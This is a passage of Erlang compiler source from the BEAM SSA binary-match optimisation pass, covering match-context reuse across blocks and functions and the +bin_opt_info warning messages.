    {T#b_br{bool=Arg}, State}.
%% Returns the alias to use for Arg at block Lbl, creating one if needed.
%% Non-aliased arguments are returned unchanged; #b_remote{} arguments
%% are descended into so their module/name fields are aliased too.
amb_get_alias(#b_var{}=Arg, Lbl, State) ->
    case maps:find(Arg, State#amb.match_aliases) of
        {ok, {AliasAfter, Context}} ->
            %% Our context may not have been created yet, so we skip assigning
            %% an alias unless the given block is among our dominators.
            Dominators = maps:get(Lbl, State#amb.dominators),
            case member(AliasAfter, Dominators) of
                true -> amb_create_alias(Arg, Context, Lbl, State);
                false -> {Arg, State}
            end;
        error ->
            {Arg, State}
    end;
amb_get_alias(#b_remote{mod=Mod0,name=Name0}=Arg0, Lbl, State0) ->
    {Mod, State1} = amb_get_alias(Mod0, Lbl, State0),
    {Name, State} = amb_get_alias(Name0, Lbl, State1),
    Arg = Arg0#b_remote{mod=Mod,name=Name},
    {Arg, State};
amb_get_alias(Arg, _Lbl, State) ->
    {Arg, State}.

%% Reuses the most recent promotion made in a dominating block, or
%% schedules a fresh bs_get_tail promotion for this block.
amb_create_alias(#b_var{}=Arg0, Context, Lbl, State0) ->
    Dominators = maps:get(Lbl, State0#amb.dominators),
    Promotions0 = State0#amb.promotions,
    PrevPromotions =
        [maps:get({Dom, Arg0}, Promotions0)
         || Dom <- Dominators, is_map_key({Dom, Arg0}, Promotions0)],
    case PrevPromotions of
        [_|_] ->
            %% We've already created an alias prior to this block, so we'll
            %% grab the most recent one to minimize stack use.
            #b_set{dst=Alias} = max(PrevPromotions),
            {Alias, State0};
        [] ->
            %% If we haven't created an alias we need to do so now. The
            %% promotion will be inserted later by amb_insert_promotions/2.
            Counter = State0#amb.cnt,
            Alias = #b_var{name={'@ssa_bsm_alias', Counter}},
            Promotion = #b_set{op=bs_get_tail,dst=Alias,args=[Context]},
            Promotions = maps:put({Lbl, Arg0}, Promotion, Promotions0),
            State = State0#amb{ promotions=Promotions, cnt=Counter+1 },
            {Alias, State}
    end.
%% Inserts each scheduled promotion into its block, immediately before
%% the first instruction that uses the promoted alias (splitwith keeps
%% everything up to — but not including — that first use).
amb_insert_promotions(Blocks0, State) ->
    F = fun({Lbl, #b_var{}}, Promotion, Blocks) ->
                Block = maps:get(Lbl, Blocks),
                Alias = Promotion#b_set.dst,
                {Before, After} = splitwith(
                                    fun(#b_set{args=Args}) ->
                                            not is_var_in_args(Alias, Args)
                                    end, Block#b_blk.is),
                Is = Before ++ [Promotion | After],
                maps:put(Lbl, Block#b_blk{is=Is}, Blocks)
        end,
    maps:fold(F, Blocks0, State#amb.promotions).
%% Tests whether Var occurs in an instruction's argument list. A
%% #b_remote{} argument counts as a use when Var is its name or module
%% field. The exact-match test runs first, mirroring argument order.
is_var_in_args(_Var, []) ->
    false;
is_var_in_args(Var, [Arg | Rest]) ->
    case Arg of
        Var -> true;
        #b_remote{name=Var} -> true;
        #b_remote{mod=Var} -> true;
        _ -> is_var_in_args(Var, Rest)
    end.
%%%
%%% Subpasses
%%%
%% Removes superfluous chained bs_start_match instructions in the same
%% function. When matching on an extracted tail binary, or on a binary we've
%% already matched on, we reuse the original match context.
%%
%% This pass runs first since it makes subsequent optimizations more effective
%% by removing spots where promotion would be required.
-type prior_match_map() ::
        #{ Binary :: #b_var{} =>
               [{ %% The context and success label of a previous
                  %% bs_start_match made on this binary.
                  ValidAfter :: beam_ssa:label(),
                  Context :: #b_var{} }] }.

%% State for the combine-matches subpass.
-record(cm, { definitions :: beam_ssa:definition_map(),
              dominators :: beam_ssa:dominator_map(),
              blocks :: beam_ssa:block_map(),
              match_aliases = #{} :: match_alias_map(),
              prior_matches = #{} :: prior_match_map(),
              renames = #{} :: beam_ssa:rename_map() }).

%% Runs the subpass on every function of the module.
combine_matches({Fs0, ModInfo}) ->
    Fs = map(fun(F) -> combine_matches(F, ModInfo) end, Fs0),
    {Fs, ModInfo}.

%% Per-function driver: rewrites each block through cm_1/4, applies the
%% accumulated variable renames, and lazily aliases any binaries whose
%% extraction was skipped. Functions without bsm ops are left untouched.
combine_matches(#b_function{bs=Blocks0,cnt=Counter0}=F, ModInfo) ->
    case funcinfo_get(F, has_bsm_ops, ModInfo) of
        true ->
            {Dominators, _} = beam_ssa:dominators(Blocks0),
            {Blocks1, State} =
                beam_ssa:mapfold_blocks_rpo(
                  fun(Lbl, #b_blk{is=Is0}=Block0, State0) ->
                          {Is, State} = cm_1(Is0, [], Lbl, State0),
                          {Block0#b_blk{is=Is}, State}
                  end, [0],
                  #cm{ definitions = beam_ssa:definitions(Blocks0),
                       dominators = Dominators,
                       blocks = Blocks0 },
                  Blocks0),
            Blocks2 = beam_ssa:rename_vars(State#cm.renames, [0], Blocks1),
            {Blocks, Counter} = alias_matched_binaries(Blocks2, Counter0,
                                                       State#cm.match_aliases),
            F#b_function{ bs=Blocks, cnt=Counter };
        false ->
            F
    end.
%% Scans a block's instructions for a trailing bs_start_match + succeeded
%% pair (note: the pattern requires them to be the LAST two instructions
%% of the block). Tail binaries reuse their original context; otherwise
%% we try to reuse a dominating prior match on the same source.
cm_1([#b_set{ op=bs_start_match,
              dst=Ctx,
              args=[Src] },
      #b_set{ op=succeeded,
              dst=Bool,
              args=[Ctx] }]=MatchSeq, Acc0, Lbl, State0) ->
    Acc = reverse(Acc0),
    case is_tail_binary(Src, State0#cm.definitions) of
        true -> cm_combine_tail(Src, Ctx, Bool, Acc, State0);
        false -> cm_handle_priors(Src, Ctx, Bool, Acc, MatchSeq, Lbl, State0)
    end;
cm_1([I | Is], Acc, Lbl, State) ->
    cm_1(Is, [I | Acc], Lbl, State);
cm_1([], Acc, _Lbl, State) ->
    {reverse(Acc), State}.
%% If we're dominated by at least one match on the same source, we can reuse
%% the context created by that match; the new bs_start_match + succeeded
%% pair is then dropped and its results renamed. Otherwise the match is
%% kept and registered as a prior for later blocks.
cm_handle_priors(Src, DstCtx, Bool, Acc, MatchSeq, Lbl, State0) ->
    PriorCtxs = case maps:find(Src, State0#cm.prior_matches) of
                    {ok, Priors} ->
                        %% We've seen other match contexts on this source, but
                        %% we can only consider the ones whose success path
                        %% dominate us.
                        Dominators = maps:get(Lbl, State0#cm.dominators, []),
                        [Ctx || {ValidAfter, Ctx} <- Priors,
                                member(ValidAfter, Dominators)];
                    error ->
                        []
                end,
    case PriorCtxs of
        [Ctx|_] ->
            Renames0 = State0#cm.renames,
            Renames = Renames0#{ Bool => #b_literal{val=true}, DstCtx => Ctx },
            {Acc, State0#cm{ renames = Renames }};
        [] ->
            %% Since we lack a prior match, we need to register this one in
            %% case we dominate another.
            State = cm_register_prior(Src, DstCtx, Lbl, State0),
            {Acc ++ MatchSeq, State}
    end.

%% Records DstCtx as a prior match on Src, valid on the success label of
%% the current block's terminating branch.
cm_register_prior(Src, DstCtx, Lbl, State) ->
    Block = maps:get(Lbl, State#cm.blocks),
    #b_br{succ=ValidAfter} = Block#b_blk.last,
    Priors0 = maps:get(Src, State#cm.prior_matches, []),
    Priors = [{ValidAfter, DstCtx} | Priors0],
    PriorMatches = maps:put(Src, Priors, State#cm.prior_matches),
    State#cm{ prior_matches = PriorMatches }.
%% Src is a tail binary: drop the new match, rename its results to the
%% original context, and alias Src (valid from block 0, as the context
%% dominates everything that can use the tail).
cm_combine_tail(Src, DstCtx, Bool, Acc, State0) ->
    SrcCtx = match_context_of(Src, State0#cm.definitions),
    %% We replace the source with a context alias as it normally won't be used
    %% on the happy path after being matched, and the added cost of conversion
    %% is negligible if it is.
    Aliases = maps:put(Src, {0, SrcCtx}, State0#cm.match_aliases),
    Renames0 = State0#cm.renames,
    Renames = Renames0#{ Bool => #b_literal{val=true}, DstCtx => SrcCtx },
    State = State0#cm{ match_aliases = Aliases, renames = Renames },
    {Acc, State}.
%% Lets functions accept match contexts as arguments. The parameter must be
%% unused before the bs_start_match instruction, and it must be matched in the
%% first block.
%% State for the accept-context-args subpass.
-record(aca, { unused_parameters :: ordsets:ordset(#b_var{}),
               counter :: non_neg_integer(),
               parameter_info = #{} :: #{ #b_var{} => param_info() },
               match_aliases = #{} :: match_alias_map() }).

%% Runs the subpass over all functions, threading ModInfo through so the
%% collected parameter_info is visible to later subpasses.
accept_context_args({Fs, ModInfo}) ->
    mapfoldl(fun accept_context_args/2, ModInfo, Fs).

%% Per-function driver: marks parameters that may be passed as match
%% contexts, aliases the matched binaries, and records parameter_info.
accept_context_args(#b_function{bs=Blocks0}=F, ModInfo0) ->
    case funcinfo_get(F, has_bsm_ops, ModInfo0) of
        true ->
            Parameters = ordsets:from_list(funcinfo_get(F, parameters, ModInfo0)),
            State0 = #aca{ unused_parameters = Parameters,
                           counter = F#b_function.cnt },
            {Blocks1, State} = aca_1(Blocks0, State0),
            {Blocks, Counter} = alias_matched_binaries(Blocks1,
                                                       State#aca.counter,
                                                       State#aca.match_aliases),
            ModInfo = funcinfo_set(F, parameter_info, State#aca.parameter_info,
                                   ModInfo0),
            {F#b_function{bs=Blocks,cnt=Counter}, ModInfo};
        false ->
            {F, ModInfo0}
    end.
aca_1(Blocks, State) ->
    %% We only handle block 0 as we don't yet support starting a match after a
    %% test. This is generally good enough as the sys_core_bsm pass makes the
    %% match instruction come first if possible, and it's rare for a function
    %% to binary-match several parameters at once.
    EntryBlock = maps:get(0, Blocks),
    aca_enable_reuse(EntryBlock#b_blk.is, EntryBlock, Blocks, [], State).

%% Walks the entry block up to the first bs_start_match. Parameters used
%% before that point are disqualified from context reuse; a match on a
%% still-unused parameter is annotated for reuse via aca_reuse_context/4.
aca_enable_reuse([#b_set{op=bs_start_match,args=[Src]}=I0 | Rest],
                 EntryBlock, Blocks0, Acc, State0) ->
    case aca_is_reuse_safe(Src, State0) of
        true ->
            {I, Last, Blocks1, State} =
                aca_reuse_context(I0, EntryBlock, Blocks0, State0),
            Is = reverse([I|Acc]) ++ Rest,
            Blocks = maps:put(0, EntryBlock#b_blk{is=Is,last=Last}, Blocks1),
            {Blocks, State};
        false ->
            {Blocks0, State0}
    end;
aca_enable_reuse([I | Is], EntryBlock, Blocks, Acc, State0) ->
    UnusedParams0 = State0#aca.unused_parameters,
    case ordsets:intersection(UnusedParams0, beam_ssa:used(I)) of
        [] ->
            aca_enable_reuse(Is, EntryBlock, Blocks, [I | Acc], State0);
        PrematureUses ->
            UnusedParams = ordsets:subtract(UnusedParams0, PrematureUses),
            %% Mark the offending parameters as unsuitable for context reuse.
            ParamInfo = foldl(fun(A, Ps) ->
                                      maps:put(A, {used_before_match, I}, Ps)
                              end, State0#aca.parameter_info, PrematureUses),
            State = State0#aca{ unused_parameters = UnusedParams,
                                parameter_info = ParamInfo },
            aca_enable_reuse(Is, EntryBlock, Blocks, [I | Acc], State)
    end;
aca_enable_reuse([], _EntryBlock, Blocks, _Acc, State) ->
    {Blocks, State}.

aca_is_reuse_safe(Src, State) ->
    %% Context reuse is unsafe unless all uses are dominated by the start_match
    %% instruction. Since we only process block 0 it's enough to check if
    %% they're unused so far.
    ordsets:is_element(Src, State#aca.unused_parameters).
%% Annotates the bs_start_match so it accepts an incoming match context,
%% aliases the source parameter (valid after the success label) and marks
%% it as suitable_for_reuse.
aca_reuse_context(#b_set{dst=Dst, args=[Src]}=I0, Block, Blocks0, State0) ->
    %% When matching fails on a reused context it needs to be converted back
    %% to a binary. We only need to do this on the success path since it can't
    %% be a context on the type failure path, but it's very common for these
    %% to converge which requires special handling.
    {State1, Last, Blocks} =
        aca_handle_convergence(Src, State0, Block#b_blk.last, Blocks0),
    Aliases = maps:put(Src, {Last#b_br.succ, Dst}, State1#aca.match_aliases),
    ParamInfo = maps:put(Src, suitable_for_reuse, State1#aca.parameter_info),
    State = State1#aca{ match_aliases = Aliases,
                        parameter_info = ParamInfo },
    I = beam_ssa:add_anno(accepts_match_contexts, true, I0),
    {I, Last, Blocks, State}.

%% Makes the success and failure paths of the entry branch disjoint if
%% Src is used after they converge, by copying the shorter path.
aca_handle_convergence(Src, State0, Last0, Blocks0) ->
    #b_br{fail=Fail0,succ=Succ0} = Last0,
    SuccPath = beam_ssa:rpo([Succ0], Blocks0),
    FailPath = beam_ssa:rpo([Fail0], Blocks0),
    %% The promotion logic in alias_matched_binaries breaks down if the source
    %% is used after the fail/success paths converge, as we have no way to tell
    %% whether the source is a match context or something else past that point.
    %%
    %% We could handle this through clever insertion of phi nodes but it's
    %% far simpler to copy either branch in its entirety. It doesn't matter
    %% which one as long as they become disjoint.
    ConvergedPaths = ordsets:intersection(
                       ordsets:from_list(SuccPath),
                       ordsets:from_list(FailPath)),
    case maps:is_key(Src, beam_ssa:uses(ConvergedPaths, Blocks0)) of
        true ->
            case shortest(SuccPath, FailPath) of
                left ->
                    {Succ, Blocks, Counter} =
                        aca_copy_successors(Succ0, Blocks0, State0#aca.counter),
                    State = State0#aca{ counter = Counter },
                    {State, Last0#b_br{succ=Succ}, Blocks};
                right ->
                    {Fail, Blocks, Counter} =
                        aca_copy_successors(Fail0, Blocks0, State0#aca.counter),
                    State = State0#aca{ counter = Counter },
                    {State, Last0#b_br{fail=Fail}, Blocks}
            end;
        false ->
            {State0, Last0, Blocks0}
    end.
%% Returns `left` when the first list is no longer than the second, and
%% `right` otherwise. Walks both lists in lock-step so neither length has
%% to be computed in full; ties resolve to `left`.
shortest(As, Bs) ->
    case {As, Bs} of
        {[], _} -> left;
        {_, []} -> right;
        {[_ | TailA], [_ | TailB]} -> shortest(TailA, TailB)
    end.
%% Copies all successor blocks of Lbl, returning the label to the entry block
%% of this copy. Since the copied blocks aren't referenced anywhere else, they
%% are all guaranteed to be dominated by Lbl.
%% Copies the subtree of blocks reachable from Lbl0, returning the label
%% of the copied entry block (see comment above).
aca_copy_successors(Lbl0, Blocks0, Counter0) ->
    %% Building the block rename map up front greatly simplifies phi node
    %% handling.
    Path = beam_ssa:rpo([Lbl0], Blocks0),
    {BRs, Counter1} = aca_cs_build_brs(Path, Counter0, #{}),
    {Blocks, Counter} = aca_cs_1(Path, Blocks0, Counter1, #{}, BRs, #{}),
    Lbl = maps:get(Lbl0, BRs),
    {Lbl, Blocks, Counter}.

%% Allocates a fresh label (from the counter) for every block on the path.
aca_cs_build_brs([?EXCEPTION_BLOCK=Lbl | Path], Counter, Acc) ->
    %% ?EXCEPTION_BLOCK is a marker and not an actual block, so renaming it
    %% will break exception handling.
    aca_cs_build_brs(Path, Counter, Acc#{ Lbl => Lbl });
aca_cs_build_brs([Lbl | Path], Counter0, Acc) ->
    aca_cs_build_brs(Path, Counter0 + 1, Acc#{ Lbl => Counter0 });
aca_cs_build_brs([], Counter, Acc) ->
    {Acc, Counter}.

%% Copies each block under its new label; the copies are merged into the
%% original block map at the end.
aca_cs_1([Lbl0 | Path], Blocks, Counter0, VRs0, BRs, Acc0) ->
    Block0 = maps:get(Lbl0, Blocks),
    Lbl = maps:get(Lbl0, BRs),
    {VRs, Block, Counter} = aca_cs_block(Block0, Counter0, VRs0, BRs),
    Acc = maps:put(Lbl, Block, Acc0),
    aca_cs_1(Path, Blocks, Counter, VRs, BRs, Acc);
aca_cs_1([], Blocks, Counter, _VRs, _BRs, Acc) ->
    {maps:merge(Blocks, Acc), Counter}.
%% Copies one block: instructions get fresh destination variables (and
%% renamed arguments), and the terminator's labels/arguments are renamed.
aca_cs_block(#b_blk{is=Is0,last=Last0}=Block0, Counter0, VRs0, BRs) ->
    {VRs, Is, Counter} = aca_cs_is(Is0, Counter0, VRs0, BRs, []),
    Last = aca_cs_last(Last0, VRs, BRs),
    Block = Block0#b_blk{is=Is,last=Last},
    {VRs, Block, Counter}.

%% Copies the instructions of a block. Every destination is replaced by a
%% fresh '@ssa_bsm_aca' variable (recorded in VRs so later uses are
%% renamed); phi arguments additionally go through the block rename map.
aca_cs_is([#b_set{op=Op,
                  dst=Dst0,
                  args=Args0}=I0 | Is],
          Counter0, VRs0, BRs, Acc) ->
    Args = case Op of
               phi -> aca_cs_args_phi(Args0, VRs0, BRs);
               _ -> aca_cs_args(Args0, VRs0)
           end,
    Counter = Counter0 + 1,
    Dst = #b_var{name={'@ssa_bsm_aca',Counter}},
    I = I0#b_set{dst=Dst,args=Args},
    VRs = maps:put(Dst0, Dst, VRs0),
    aca_cs_is(Is, Counter, VRs, BRs, [I | Acc]);
aca_cs_is([], Counter, VRs, _BRs, Acc) ->
    {VRs, reverse(Acc), Counter}.
%% Renames the terminator of a copied block: target labels through BRs,
%% value arguments through VRs.
aca_cs_last(#b_switch{arg=Arg0,list=Switch0,fail=Fail0}=Sw, VRs, BRs) ->
    Switch = [{Literal, maps:get(Lbl, BRs)} || {Literal, Lbl} <- Switch0],
    Sw#b_switch{arg=aca_cs_arg(Arg0, VRs),
                fail=maps:get(Fail0, BRs),
                list=Switch};
aca_cs_last(#b_br{bool=Arg0,succ=Succ0,fail=Fail0}=Br, VRs, BRs) ->
    Br#b_br{bool=aca_cs_arg(Arg0, VRs),
            succ=maps:get(Succ0, BRs),
            fail=maps:get(Fail0, BRs)};
aca_cs_last(#b_ret{arg=Arg0}=Ret, VRs, _BRs) ->
    Ret#b_ret{arg=aca_cs_arg(Arg0, VRs)}.
%% Renames phi arguments of a copied block: the value goes through the
%% variable rename map and the source label through the block rename map.
%% Arguments whose source block was not copied (no BRs entry) are dropped,
%% since that predecessor cannot branch into the copy.
aca_cs_args_phi(Args, VRs, BRs) ->
    [{aca_cs_arg(Arg, VRs), map_get(Lbl, BRs)}
     || {Arg, Lbl} <- Args, is_map_key(Lbl, BRs)].

%% Renames a plain argument list through the variable rename map.
aca_cs_args(Args, VRs) ->
    [aca_cs_arg(Arg, VRs) || Arg <- Args].
%% Renames a single argument through the variable rename map. A
%% #b_remote{} is descended into so its module and name fields are
%% renamed as well; anything without a rename entry is left as-is.
aca_cs_arg(#b_remote{mod=Mod0,name=Name0}=Rem, VRs) ->
    Rem#b_remote{mod=aca_cs_arg(Mod0, VRs),
                 name=aca_cs_arg(Name0, VRs)};
aca_cs_arg(Arg, VRs) ->
    maps:get(Arg, VRs, Arg).
%% Allows contexts to pass through "wrapper functions" where the context is
%% passed directly to a function that accepts match contexts (including other
%% wrappers).
%%
%% This does not alter the function in any way, it only changes parameter info
%% so that skip_outgoing_tail_extraction is aware that it's safe to pass
%% contexts to us.
%% Entry point of the context-passthrough subpass: only parameter_info in
%% ModInfo is updated, the functions themselves are untouched.
allow_context_passthrough({Fs, ModInfo0}) ->
    ModInfo =
        acp_forward_params([{F, beam_ssa:uses(F#b_function.bs)} || F <- Fs],
                           ModInfo0),
    {Fs, ModInfo}.

%% Iterates to a fixpoint: marking one function as accepting contexts can
%% enable passthrough in its callers, so the fold repeats until ModInfo
%% no longer changes.
acp_forward_params(FsUses, ModInfo0) ->
    F = fun({#b_function{args=Parameters}=Func, UseMap}, ModInfo) ->
                ParamInfo =
                    foldl(fun(Param, ParamInfo) ->
                                  Uses = maps:get(Param, UseMap, []),
                                  acp_1(Param, Uses, ModInfo, ParamInfo)
                          end,
                          funcinfo_get(Func, parameter_info, ModInfo),
                          Parameters),
                funcinfo_set(Func, parameter_info, ParamInfo, ModInfo)
        end,
    %% Allowing context passthrough on one function may make it possible to
    %% enable it on another, so it needs to be repeated for maximum effect.
    case foldl(F, ModInfo0, FsUses) of
        ModInfo0 -> ModInfo0;
        Changed -> acp_forward_params(FsUses, Changed)
    end.
%% We have no way to know if an argument is a context, so it's only safe to
%% forward them if they're passed exactly once in the first block. Any other
%% uses are unsafe, including function_clause errors.
%% A parameter can only be forwarded if its sole use is a single call in
%% the entry block (label 0); any other use pattern leaves the info as-is.
acp_1(Param, [{0, #b_set{op=call}=I}], ModInfo, ParamInfo) ->
    %% We don't need to provide a context chain as our callers make sure that
    %% multiple arguments never reference the same context.
    case check_context_call(I, Param, [], ModInfo) of
        {no_match_on_entry, _} -> ParamInfo;
        Other -> maps:put(Param, Other, ParamInfo)
    end;
acp_1(_Param, _Uses, _ModInfo, ParamInfo) ->
    ParamInfo.
%% This is conceptually similar to combine_matches but operates across
%% functions. Whenever a tail binary is passed to a parameter that accepts
%% match contexts we'll pass the context instead, improving performance by
%% avoiding the creation of a new match context in the callee.
%%
%% We also create an alias to delay extraction until it's needed as an actual
%% binary, which is often rare on the happy path. The cost of being wrong is
%% negligible (`bs_test_unit + bs_get_tail` vs `bs_get_binary`) so we're
%% applying it unconditionally to keep things simple.
%% State for the skip-outgoing-tail-extraction subpass.
-record(sote, { definitions :: beam_ssa:definition_map(),
                mod_info :: module_info(),
                match_aliases = #{} :: match_alias_map() }).

%% Runs the subpass on every function of the module.
skip_outgoing_tail_extraction({Fs0, ModInfo}) ->
    Fs = map(fun(F) -> skip_outgoing_tail_extraction(F, ModInfo) end, Fs0),
    {Fs, ModInfo}.

%% Per-function driver: rewrites calls so tail binaries are passed as
%% match contexts where the callee accepts them, then aliases the
%% affected binaries for any remaining uses.
skip_outgoing_tail_extraction(#b_function{bs=Blocks0}=F, ModInfo) ->
    case funcinfo_get(F, has_bsm_ops, ModInfo) of
        true ->
            State0 = #sote{ definitions = beam_ssa:definitions(Blocks0),
                            mod_info = ModInfo },
            {Blocks1, State} = beam_ssa:mapfold_instrs_rpo(
                                 fun sote_rewrite_calls/2, [0], State0, Blocks0),
            {Blocks, Counter} = alias_matched_binaries(Blocks1,
                                                       F#b_function.cnt,
                                                       State#sote.match_aliases),
            F#b_function{bs=Blocks,cnt=Counter};
        false ->
            F
    end.
%% Only call instructions are of interest; everything else passes through.
sote_rewrite_calls(#b_set{op=call,args=Args}=Call, State) ->
    sote_rewrite_call(Call, Args, [], State);
sote_rewrite_calls(I, State) ->
    {I, State}.

%% Rewrites a call argument by argument: a tail binary passed to a callee
%% that accepts match contexts is replaced by its context (and the binary
%% is aliased for other uses); otherwise a bsm_info annotation records
%% why reuse was not possible. ArgsOut is accumulated in reverse.
sote_rewrite_call(Call, [], ArgsOut, State) ->
    {Call#b_set{args=reverse(ArgsOut)}, State};
sote_rewrite_call(Call0, [Arg | ArgsIn], ArgsOut, State0) ->
    case is_tail_binary(Arg, State0#sote.definitions) of
        true ->
            CtxChain = context_chain_of(Arg, State0#sote.definitions),
            case check_context_call(Call0, Arg, CtxChain, State0#sote.mod_info) of
                suitable_for_reuse ->
                    Ctx = match_context_of(Arg, State0#sote.definitions),
                    MatchAliases0 = State0#sote.match_aliases,
                    MatchAliases = maps:put(Arg, {0, Ctx}, MatchAliases0),
                    State = State0#sote{ match_aliases = MatchAliases },
                    Call = beam_ssa:add_anno(bsm_info, context_reused, Call0),
                    sote_rewrite_call(Call, ArgsIn, [Ctx | ArgsOut], State);
                Other ->
                    Call = beam_ssa:add_anno(bsm_info, Other, Call0),
                    sote_rewrite_call(Call, ArgsIn, [Arg | ArgsOut], State0)
            end;
        false ->
            sote_rewrite_call(Call0, ArgsIn, [Arg | ArgsOut], State0)
    end.
%% Adds parameter_type_info annotations to help the validator determine whether
%% our optimizations were safe.
annotate_context_parameters({Fs, ModInfo}) ->
    mapfoldl(fun annotate_context_parameters/2, ModInfo, Fs).

%% Adds a #t_bs_context{} type annotation for every parameter marked as
%% suitable_for_reuse, so the validator knows it may receive a context.
annotate_context_parameters(F, ModInfo) ->
    ParamInfo = funcinfo_get(F, parameter_info, ModInfo),
    TypeAnno0 = beam_ssa:get_anno(parameter_type_info, F, #{}),
    TypeAnno = maps:fold(fun(K, _V, Acc) when is_map_key(K, Acc) ->
                                 %% Assertion.
                                 error(conflicting_parameter_types);
                            (K, suitable_for_reuse, Acc) ->
                                 Acc#{ K => #t_bs_context{} };
                            (_K, _V, Acc) ->
                                 Acc
                         end, TypeAnno0, ParamInfo),
    {beam_ssa:add_anno(parameter_type_info, TypeAnno, F), ModInfo}.
%%%
%%% +bin_opt_info
%%%
%% Gathers +bin_opt_info warnings from all functions by folding over
%% every instruction.
collect_opt_info(Fs) ->
    foldl(fun(#b_function{bs=Blocks}=F, Acc0) ->
                  UseMap = beam_ssa:uses(Blocks),
                  Where = beam_ssa:get_anno(location, F, []),
                  beam_ssa:fold_instrs_rpo(
                    fun(I, Acc) ->
                            collect_opt_info_1(I, Where, UseMap, Acc)
                    end, [0], Acc0, Blocks)
          end, [], Fs).

%% Emits warnings for tail binaries that were NOT optimized away (their
%% uses forced an actual binary to be built) and for instructions that
%% carry an explicit bsm_info annotation.
collect_opt_info_1(#b_set{op=Op,anno=Anno,dst=Dst}=I, Where, UseMap, Acc0) ->
    case is_tail_binary(I) of
        true when Op =:= bs_match ->
            %% The uses include when the context is passed raw, so we discard
            %% everything but the bs_extract instruction to limit warnings to
            %% unoptimized uses.
            Uses0 = maps:get(Dst, UseMap, []),
            case [E || {_, #b_set{op=bs_extract}=E} <- Uses0] of
                [Use] -> add_unopt_binary_info(Use, false, Where, UseMap, Acc0);
                [] -> Acc0
            end;
        true ->
            %% Add a warning for each use. Note that we don't do anything
            %% special if unused as a later pass will remove this instruction
            %% anyway.
            Uses = maps:get(Dst, UseMap, []),
            foldl(fun({_Lbl, Use}, Acc) ->
                          add_unopt_binary_info(Use, false, Where, UseMap, Acc)
                  end, Acc0, Uses);
        false ->
            add_opt_info(Anno, Where, Acc0)
    end;
collect_opt_info_1(#b_ret{anno=Anno}, Where, _UseMap, Acc) ->
    add_opt_info(Anno, Where, Acc);
collect_opt_info_1(_I, _Where, _Uses, Acc) ->
    Acc.
%% Prepends a warning to Acc when the annotation map carries a bsm_info
%% term; otherwise Acc is returned unchanged.
add_opt_info(Anno, Where, Acc) ->
    case Anno of
        #{bsm_info := Term} -> [make_warning(Term, Anno, Where) | Acc];
        #{} -> Acc
    end.
%% When an alias is promoted we need to figure out where it goes to ignore
%% warnings for compiler-generated things, and provide more useful warnings in
%% general.
%%
%% We track whether the binary has been used to build another term because it
%% can be helpful when there's no line information.
%% Follows a promoted binary to the place it actually ends up, so the
%% warning points at the real consumer. Nested=true means the binary was
%% first placed inside another term.
add_unopt_binary_info(#b_set{op=Follow,dst=Dst}, _Nested, Where, UseMap, Acc0)
  when Follow =:= put_tuple;
       Follow =:= put_list;
       Follow =:= put_map ->
    %% Term-building instructions.
    {_, Uses} = unzip(maps:get(Dst, UseMap, [])),
    foldl(fun(Use, Acc) ->
                  add_unopt_binary_info(Use, true, Where, UseMap, Acc)
          end, Acc0, Uses);
add_unopt_binary_info(#b_set{op=Follow,dst=Dst}, Nested, Where, UseMap, Acc0)
  when Follow =:= bs_extract;
       Follow =:= phi ->
    %% Non-building instructions that need to be followed.
    {_, Uses} = unzip(maps:get(Dst, UseMap, [])),
    foldl(fun(Use, Acc) ->
                  add_unopt_binary_info(Use, Nested, Where, UseMap, Acc)
          end, Acc0, Uses);
add_unopt_binary_info(#b_set{op=call,
                             args=[#b_remote{mod=#b_literal{val=erlang},
                                             name=#b_literal{val=error}} |
                                   _Ignored]},
                      _Nested, _Where, _UseMap, Acc) ->
    %% There's no nice way to tell compiler-generated exceptions apart from
    %% user ones so we ignore them all. I doubt anyone cares.
    Acc;
add_unopt_binary_info(#b_switch{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
    [make_promotion_warning(I, Nested, Anno, Where) | Acc];
add_unopt_binary_info(#b_set{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
    [make_promotion_warning(I, Nested, Anno, Where) | Acc];
add_unopt_binary_info(#b_ret{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
    [make_promotion_warning(I, Nested, Anno, Where) | Acc];
add_unopt_binary_info(#b_br{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
    [make_promotion_warning(I, Nested, Anno, Where) | Acc].

make_promotion_warning(I, Nested, Anno, Where) ->
    make_warning({binary_created, I, Nested}, Anno, Where).

%% Builds a compiler warning tuple. NOTE(review): this assumes the
%% `location` annotation (or the Where fallback) is a {File,Line} tuple;
%% the [] default used in collect_opt_info/1 would crash here — TODO
%% confirm a location annotation is always present on the function.
make_warning(Term, Anno, Where) ->
    {File, Line} = maps:get(location, Anno, Where),
    {File,[{Line,?MODULE,Term}]}.
%% Renders a bsm_info term as a human-readable +bin_opt_info message.
format_opt_info(context_reused) ->
    "OPTIMIZED: match context reused";
format_opt_info({binary_created, _, _}=Promotion) ->
    io_lib:format("BINARY CREATED: ~s", [format_opt_info_1(Promotion)]);
format_opt_info(Other) ->
    io_lib:format("NOT OPTIMIZED: ~s", [format_opt_info_1(Other)]).

%% Detail text for each failure/promotion reason. The final clause is a
%% catch-all that just prints the raw term.
format_opt_info_1({binary_created, #b_set{op=call,args=[Call|_]}, false}) ->
    io_lib:format("binary is used in call to ~s which doesn't support "
                  "context reuse", [format_call(Call)]);
format_opt_info_1({binary_created, #b_set{op=call,args=[Call|_]}, true}) ->
    io_lib:format("binary is used in term passed to ~s",
                  [format_call(Call)]);
format_opt_info_1({binary_created, #b_set{op={bif, BIF},args=Args}, false}) ->
    io_lib:format("binary is used in ~p/~p which doesn't support context "
                  "reuse", [BIF, length(Args)]);
format_opt_info_1({binary_created, #b_set{op={bif, BIF},args=Args}, true}) ->
    io_lib:format("binary is used in term passed to ~p/~p",
                  [BIF, length(Args)]);
format_opt_info_1({binary_created, #b_set{op=Op}, false}) ->
    io_lib:format("binary is used in '~p' which doesn't support context "
                  "reuse", [Op]);
format_opt_info_1({binary_created, #b_set{op=Op}, true}) ->
    io_lib:format("binary is used in term passed to '~p'", [Op]);
format_opt_info_1({binary_created, #b_ret{}, false}) ->
    io_lib:format("binary is returned from the function", []);
format_opt_info_1({binary_created, #b_ret{}, true}) ->
    io_lib:format("binary is used in a term that is returned from the "
                  "function", []);
format_opt_info_1({unsuitable_call, {Call, Inner}}) ->
    io_lib:format("binary used in call to ~s, where ~s",
                  [format_call(Call), format_opt_info_1(Inner)]);
format_opt_info_1({remote_call, Call}) ->
    io_lib:format("binary is used in remote call to ~s", [format_call(Call)]);
